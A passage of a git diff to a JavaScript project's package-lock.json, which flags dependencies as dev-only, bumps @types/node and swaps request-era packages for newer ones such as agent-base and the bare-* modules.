"https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", - "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==" + "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", + "dev": true }, "@types/istanbul-lib-report": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", + "dev": true, "requires": { "@types/istanbul-lib-coverage": "*" } @@ -4784,6 +5071,7 @@ "version": "3.0.1", "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", + "dev": true, "requires": { "@types/istanbul-lib-report": "*" } @@ -4792,6 +5080,7 @@ "version": "29.5.14", "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.5.14.tgz", "integrity": "sha512-ZN+4sdnLUbo8EVvVc2ao0GFW6oVrQRPn4K2lglySj7APvSrgzxHiNNK99us4WDMi57xxA2yggblIAMNhXOotLQ==", + "dev": true, "requires": { "expect": "^29.0.0", "pretty-format": "^29.0.0" @@ -4804,40 +5093,34 @@ "dev": true }, "@types/node": { - "version": "20.17.10", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.17.10.tgz", - "integrity": "sha512-/jrvh5h6NXhEauFFexRin69nA0uHJ5gwk4iDivp/DeoEua3uwCUto6PC86IpRITBOs4+6i2I56K5x5b6WYGXHA==", + "version": "22.15.32", + "resolved": "https://registry.npmjs.org/@types/node/-/node-22.15.32.tgz", + "integrity": "sha512-3jigKqgSjsH6gYZv2nEsqdXfZqIFGAV36XYYjf9KGZ3PSG+IhLecqPnI310RvjutyMwifE2hhhNEklOUrvx/wA==", + "dev": true, "requires": { - "undici-types": "~6.19.2" + "undici-types": "~6.21.0" } }, - "@types/request": { - "version": "2.48.8", - "resolved": "https://registry.npmjs.org/@types/request/-/request-2.48.8.tgz", - "integrity": "sha512-whjk1EDJPcAR2kYHRbFl/lKeeKYTi05A15K9bnLInCVroNDCtXce57xKdI0/rQaA3K+6q0eFyUBPmqfSndUZdQ==", + "@types/node-fetch": { + "version": "2.6.12", + "resolved": "https://registry.npmjs.org/@types/node-fetch/-/node-fetch-2.6.12.tgz", + "integrity": "sha512-8nneRWKCg3rMtF69nLQJnOYUcbafYeFSjqkw3jCRLsqkWFlHaoQrr5mXmofFGOx3DKn7UfmBMyov8ySvLRVldA==", "dev": true, "requires": { - "@types/caseless": "*", "@types/node": "*", - "@types/tough-cookie": "*", - "form-data": "^2.5.0" + "form-data": "^4.0.0" } }, "@types/stack-utils": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==" - }, - "@types/tough-cookie": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/@types/tough-cookie/-/tough-cookie-4.0.2.tgz", - "integrity": "sha512-Q5vtl1W5ue16D+nIaW8JWebSSraJVlK+EthKn7e7UcD4KWsaSJ8BqGPXNaPghgtcn/fhvrN17Tv8ksUsQpiplw==", + "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", "dev": true }, - "@types/ws": { - "version": "8.5.5", - "resolved": "https://registry.npmjs.org/@types/ws/-/ws-8.5.5.tgz", - "integrity": "sha512-lwhs8hktwxSjf9UaZ9tG5M03PGogvFaH8gUgLNbN9HKIg0dvv6q+gkSuJ8HN4/VbyxkuLzCjlN7GquQ0gUJfIg==", + "@types/stream-buffers": { + "version": "3.0.7", + "resolved": "https://registry.npmjs.org/@types/stream-buffers/-/stream-buffers-3.0.7.tgz", + "integrity": "sha512-azOCy05sXVXrO+qklf0c/B07H/oHaIuDDAiHPVwlk3A9Ek+ksHyTeMajLZl3r76FxpPpxem//4Te61G1iW3Giw==", "dev": true, "requires": { "@types/node": "*" @@ -4847,6 +5130,7 @@ "version": "17.0.24", "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.24.tgz", "integrity": "sha512-6i0aC7jV6QzQB8ne1joVZ0eSFIstHsCrobmOtghM11yGlH0j43FKL2UhWdELkyps0zuf7qVTUVCCR+tgSlyLLw==", + "dev": true, "requires": { "@types/yargs-parser": "*" } @@ -4854,24 +5138,20 @@ "@types/yargs-parser": { "version": "21.0.0", "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", - "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==" + "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", + "dev": true }, - "ajv": { - "version": "6.12.6", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", - "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", - "dev": true, - "requires": { - "fast-deep-equal": "^3.1.1", - "fast-json-stable-stringify": "^2.0.0", - "json-schema-traverse": "^0.4.1", - "uri-js": "^4.2.2" - } + "agent-base": { + "version": "7.1.3", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.3.tgz", + "integrity": "sha512-jRR5wdylq8CkOe6hei19GGZnxM6rBGwFl3Bg0YItGDimvjGtAvdZk4Pu6Cl4u4Igsws4a1fd1Vq3ezrhn4KmFw==", + "dev": true }, "ansi-escapes": { "version": "4.3.2", "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", + "dev": true, "requires": { "type-fest": "^0.21.3" } @@ -4879,12 +5159,14 @@ "ansi-regex": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==" + "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", + "dev": true }, "ansi-styles": { "version": "4.3.0", "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, "requires": { "color-convert": "^2.0.1" } @@ -4893,6 +5175,7 @@ "version": "3.1.3", "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", + "dev": true, "requires": { "normalize-path": "^3.0.0", "picomatch": "^2.0.4" @@ -4904,25 +5187,11 @@ "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==", "dev": true }, - "asn1": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", - "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", - "dev": true, - "requires": { - "safer-buffer": "~2.1.0" - } - }, - "assert-plus": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", - "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==", - "dev": true - }, "async": { "version": "3.2.6", "resolved": "https://registry.npmjs.org/async/-/async-3.2.6.tgz", - "integrity": "sha512-htCUDlxyyCLMgaM3xXg0C0LW2xqfuQ6p05pCEIsXuyQ+a1koYKTuBMzRNwmybfLgvJDMd0r1LTn4+E0Ti6C2AA==" + "integrity": "sha512-htCUDlxyyCLMgaM3xXg0C0LW2xqfuQ6p05pCEIsXuyQ+a1koYKTuBMzRNwmybfLgvJDMd0r1LTn4+E0Ti6C2AA==", + "dev": true }, "asynckit": { "version": "0.4.0", @@ -4930,22 +5199,17 @@ "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==", "dev": true }, - "aws-sign2": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", - "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==", - "dev": true - }, - "aws4": { - "version": "1.12.0", - "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", - "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==", + "b4a": { + "version": "1.6.7", + "resolved": "https://registry.npmjs.org/b4a/-/b4a-1.6.7.tgz", + "integrity": "sha512-OnAYlL5b7LEkALw87fUVafQw5rVR9RjwGd4KUwNQ6DrrNmaVaUCgLipfVlzrPQ4tWOR9P0IXGNOx50jYCCdSJg==", "dev": true }, "babel-jest": { "version": "29.7.0", "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.7.0.tgz", "integrity": "sha512-BrvGY3xZSwEcCzKvKsCi2GgHqDqsYkOP4/by5xCgIwGXQxIEh+8ew3gmrE1y7XRR6LHZIj6yLYnUi/mm2KXKBg==", + "dev": true, "requires": { "@jest/transform": "^29.7.0", "@types/babel__core": "^7.1.14", @@ -4960,6 +5224,7 @@ "version": "6.1.1", "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", + "dev": true, "requires": { "@babel/helper-plugin-utils": "^7.0.0", "@istanbuljs/load-nyc-config": "^1.0.0", @@ -4972,6 +5237,7 @@ "version": "29.6.3", "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.6.3.tgz", "integrity": "sha512-ESAc/RJvGTFEzRwOTT4+lNDk/GNHMkKbNzsvT0qKRfDyyYTskxB5rnU2njIDYVxXCBHHEI1c0YwHob3WaYujOg==", + "dev": true, "requires": { "@babel/template": "^7.3.3", "@babel/types": "^7.3.3", @@ -4983,6 +5249,7 @@ "version": "1.0.1", "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", + "dev": true, "requires": { "@babel/plugin-syntax-async-generators": "^7.8.4", "@babel/plugin-syntax-bigint": "^7.8.3", @@ -5002,6 +5269,7 @@ "version": "29.6.3", "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.6.3.tgz", "integrity": "sha512-0B3bhxR6snWXJZtR/RliHTDPRgn1sNHOR0yVtq/IiQFyuOVjFS+wuio/R4gSNkyYmKmJB4wGZv2NZanmKmTnNA==", + "dev": true, "requires": { "babel-plugin-jest-hoist": "^29.6.3", "babel-preset-current-node-syntax": "^1.0.0" @@ -5010,21 +5278,60 @@ "balanced-match": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" + "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", + "dev": true }, - "bcrypt-pbkdf": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", - "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", + "bare-events": { + "version": "2.5.4", + "resolved": "https://registry.npmjs.org/bare-events/-/bare-events-2.5.4.tgz", + "integrity": "sha512-+gFfDkR8pj4/TrWCGUGWmJIkBwuxPS5F+a5yWjOHQt2hHvNZd5YLzadjmDUtFmMM4y429bnKLa8bYBMHcYdnQA==", + "dev": true, + "optional": true + }, + "bare-fs": { + "version": "4.1.5", + "resolved": "https://registry.npmjs.org/bare-fs/-/bare-fs-4.1.5.tgz", + "integrity": "sha512-1zccWBMypln0jEE05LzZt+V/8y8AQsQQqxtklqaIyg5nu6OAYFhZxPXinJTSG+kU5qyNmeLgcn9AW7eHiCHVLA==", + "dev": true, + "optional": true, + "requires": { + "bare-events": "^2.5.4", + "bare-path": "^3.0.0", + "bare-stream": "^2.6.4" + } + }, + "bare-os": { + "version": "3.6.1", + "resolved": "https://registry.npmjs.org/bare-os/-/bare-os-3.6.1.tgz", + "integrity": "sha512-uaIjxokhFidJP+bmmvKSgiMzj2sV5GPHaZVAIktcxcpCyBFFWO+YlikVAdhmUo2vYFvFhOXIAlldqV29L8126g==", + "dev": true, + "optional": true + }, + "bare-path": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/bare-path/-/bare-path-3.0.0.tgz", + "integrity": "sha512-tyfW2cQcB5NN8Saijrhqn0Zh7AnFNsnczRcuWODH0eYAXBsJ5gVxAUuNr7tsHSC6IZ77cA0SitzT+s47kot8Mw==", + "dev": true, + "optional": true, + "requires": { + "bare-os": "^3.0.1" + } + }, + "bare-stream": { + "version": "2.6.5", + "resolved": "https://registry.npmjs.org/bare-stream/-/bare-stream-2.6.5.tgz", + "integrity": "sha512-jSmxKJNJmHySi6hC42zlZnq00rga4jjxcgNZjY9N5WlOe/iOoGRtdwGsHzQv2RlH2KOYMwGUXhf2zXd32BA9RA==", "dev": true, + "optional": true, "requires": { - "tweetnacl": "^0.14.3" + "streamx": "^2.21.0" } }, "brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", + "version": "1.1.12", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.12.tgz", + "integrity": "sha512-9T9UjW3r0UW5c1Q7GTwllptXwhvYmEzFhzMfZ9H7FQWt+uZePjZPjBP/W1ZEyZ1twGWom5/56TF4lPcqjnDHcg==", + "dev": true, "requires": { "balanced-match": "^1.0.0", "concat-map": "0.0.1" @@ -5034,6 +5341,7 @@ "version": "3.0.3", "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", + "dev": true, "requires": { "fill-range": "^7.1.1" } @@ -5042,6 +5350,7 @@ "version": "4.24.2", "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.24.2.tgz", "integrity": "sha512-ZIc+Q62revdMcqC6aChtW4jz3My3klmCO1fEmINZY/8J3EpBg5/A/D0AKmBveUh6pgoeycoMkVMko84tuYS+Gg==", + "dev": true, "requires": { "caniuse-lite": "^1.0.30001669", "electron-to-chromium": "^1.5.41", @@ -5053,6 +5362,7 @@ "version": "0.2.6", "resolved": "https://registry.npmjs.org/bs-logger/-/bs-logger-0.2.6.tgz", "integrity": "sha512-pd8DCoxmbgc7hyPKOvxtqNcjYoOsABPQdcCUjGp3d42VR2CX1ORhk2A87oqqu5R1kk+76nsxZupkmyd+MVtCog==", + "dev": true, "requires": { "fast-json-stable-stringify": "2.x" } @@ -5061,6 +5371,7 @@ "version": "2.1.1", "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", + "dev": true, "requires": { "node-int64": "^0.4.0" } @@ -5068,39 +5379,42 @@ "buffer-from": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==" - }, - "byline": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/byline/-/byline-5.0.0.tgz", - "integrity": "sha512-s6webAy+R4SR8XVuJWt2V2rGvhnrhxN+9S15GNuTK3wKPOXFF6RNc+8ug2XhH+2s4f+uudG4kUVYmYOQWL2g0Q==", + "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", "dev": true }, + "call-bind-apply-helpers": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/call-bind-apply-helpers/-/call-bind-apply-helpers-1.0.2.tgz", + "integrity": "sha512-Sp1ablJ0ivDkSzjcaJdxEunN5/XvksFJ2sMBFfq6x0ryhQV/2b/KwFe21cMpmHtPOSij8K99/wSfoEuTObmuMQ==", + "dev": true, + "requires": { + "es-errors": "^1.3.0", + "function-bind": "^1.1.2" + } + }, "callsites": { "version": "3.1.0", "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==" + "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", + "dev": true }, "camelcase": { "version": "5.3.1", "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==" + "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", + "dev": true }, "caniuse-lite": { "version": "1.0.30001680", "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001680.tgz", - "integrity": "sha512-rPQy70G6AGUMnbwS1z6Xg+RkHYPAi18ihs47GH0jcxIG7wArmPgY3XbS2sRdBbxJljp3thdT8BIqv9ccCypiPA==" - }, - "caseless": { - "version": "0.12.0", - "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", - "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==", + "integrity": "sha512-rPQy70G6AGUMnbwS1z6Xg+RkHYPAi18ihs47GH0jcxIG7wArmPgY3XbS2sRdBbxJljp3thdT8BIqv9ccCypiPA==", "dev": true }, "chalk": { "version": "4.1.2", "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dev": true, "requires": { "ansi-styles": "^4.1.0", "supports-color": "^7.1.0" @@ -5109,28 +5423,26 @@ "char-regex": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==" - }, - "chownr": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-2.0.0.tgz", - "integrity": "sha512-bIomtDF5KGpdogkLd9VspvFzk9KfpyyGlS8YFVZl7TGPBHL5snIOnxeshwVgPteQ9b4Eydl+pVbIyE1DcvCWgQ==", + "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", "dev": true }, "ci-info": { "version": "3.8.0", "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.8.0.tgz", - "integrity": "sha512-eXTggHWSooYhq49F2opQhuHWgzucfF2YgODK4e1566GQs5BIfP30B0oenwBJHfWxAs2fyPB1s7Mg949zLf61Yw==" + "integrity": "sha512-eXTggHWSooYhq49F2opQhuHWgzucfF2YgODK4e1566GQs5BIfP30B0oenwBJHfWxAs2fyPB1s7Mg949zLf61Yw==", + "dev": true }, "cjs-module-lexer": { "version": "1.4.1", "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.4.1.tgz", - "integrity": "sha512-cuSVIHi9/9E/+821Qjdvngor+xpnlwnuwIyZOaLmHBVdXL+gP+I6QQB9VkO7RI77YIcTV+S1W9AreJ5eN63JBA==" + "integrity": "sha512-cuSVIHi9/9E/+821Qjdvngor+xpnlwnuwIyZOaLmHBVdXL+gP+I6QQB9VkO7RI77YIcTV+S1W9AreJ5eN63JBA==", + "dev": true }, "cliui": { "version": "8.0.1", "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", + "dev": true, "requires": { "string-width": "^4.2.0", "strip-ansi": "^6.0.1", @@ -5140,17 +5452,20 @@ "co": { "version": "4.6.0", "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==" + "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", + "dev": true }, "collect-v8-coverage": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==" + "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", + "dev": true }, "color-convert": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", + "dev": true, "requires": { "color-name": "~1.1.4" } @@ -5158,7 +5473,8 @@ "color-name": { "version": "1.1.4", "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" + "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", + "dev": true }, "combined-stream": { "version": "1.0.8", @@ -5172,23 +5488,20 @@ "concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==" + "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", + "dev": true }, "convert-source-map": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==" - }, - "core-util-is": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", - "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==", + "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", "dev": true }, "create-jest": { "version": "29.7.0", "resolved": "https://registry.npmjs.org/create-jest/-/create-jest-29.7.0.tgz", "integrity": "sha512-Adz2bdH0Vq3F53KEMJOoftQFutWCukm6J24wbPWRO4k1kMY7gS7ds/uoJkNuV8wDCtWWnuwGcJwpWcih+zEW1Q==", + "dev": true, "requires": { "@jest/types": "^29.6.3", "chalk": "^4.0.0", @@ -5203,25 +5516,18 @@ "version": "7.0.6", "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz", "integrity": "sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==", + "dev": true, "requires": { "path-key": "^3.1.0", "shebang-command": "^2.0.0", "which": "^2.0.1" } }, - "dashdash": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", - "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", - "dev": true, - "requires": { - "assert-plus": "^1.0.0" - } - }, "debug": { "version": "4.3.4", "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", + "dev": true, "requires": { "ms": "2.1.2" } @@ -5230,12 +5536,14 @@ "version": "1.5.3", "resolved": "https://registry.npmjs.org/dedent/-/dedent-1.5.3.tgz", "integrity": "sha512-NHQtfOOW68WD8lgypbLA5oT+Bt0xXJhiYvoR6SmmNXZfpzOGXwdKWmcwG8N7PwVVWV3eF/68nmD9BaJSsTBhyQ==", + "dev": true, "requires": {} }, "deepmerge": { "version": "4.3.1", "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==" + "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", + "dev": true }, "delayed-stream": { "version": "1.0.0", @@ -5246,27 +5554,31 @@ "detect-newline": { "version": "3.1.0", "resolved": 